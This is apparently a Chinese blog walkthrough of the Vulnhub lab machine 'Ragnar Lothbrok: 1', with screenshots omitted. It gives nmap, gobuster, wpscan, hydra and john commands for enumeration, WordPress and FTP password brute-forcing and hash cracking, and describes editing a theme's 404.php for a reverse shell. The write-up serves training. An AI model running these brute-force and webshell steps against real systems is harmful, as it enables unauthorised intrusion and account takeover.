Vulnhub: Ragnar Lothbrok: 1靶机

kali:192.168.111.111

靶机:192.168.111.226

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.226

Vulnhub: Ragnar Lothbrok: 1靶机_第1张图片

作者提示修改hosts文件

Vulnhub: Ragnar Lothbrok: 1靶机_第2张图片

目录爆破

gobuster dir -u http://armbjorn -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,bak,txt,html,sql,zip,phtml,sh,pcapng,pcap,conf

Vulnhub: Ragnar Lothbrok: 1靶机_第3张图片

secret内容

Vulnhub: Ragnar Lothbrok: 1靶机_第4张图片

secret的内容作为密码字典爆破wordpress

wpscan --url http://armbjorn/wordpress -e u,ap,at,cb,dbe --plugins-detection aggressive
wpscan --url http://armbjorn/wordpress -U ragnar -P ./pass.txt

Vulnhub: Ragnar Lothbrok: 1靶机_第5张图片

修改后台源码

Vulnhub: Ragnar Lothbrok: 1靶机_第6张图片

修改完后访问http://armbjorn/wordpress/wp-content/themes/twentytwenty/404.php获得反弹shell

Vulnhub: Ragnar Lothbrok: 1靶机_第7张图片

提权

查看/etc/passwd,目标存在ragnar用户

Vulnhub: Ragnar Lothbrok: 1靶机_第8张图片

利用之前搜集的密码字典爆破目标ftp,得到ragnar用户密码:lagertha

hydra -l ragnar -P ./pass.txt 192.168.111.226 -s 21 ftp -t 64

Vulnhub: Ragnar Lothbrok: 1靶机_第9张图片

切换到ragnar用户

Vulnhub: Ragnar Lothbrok: 1靶机_第10张图片

ragnar用户家目录,在secret文件中发现root用户密码密文

tail secret

利用john爆破

john hash --wordlist=/usr/share/wordlists/rockyou.txt

Vulnhub: Ragnar Lothbrok: 1靶机_第11张图片

切换到root

Vulnhub: Ragnar Lothbrok: 1靶机_第12张图片

你可能感兴趣的:(安全,web安全,网络安全)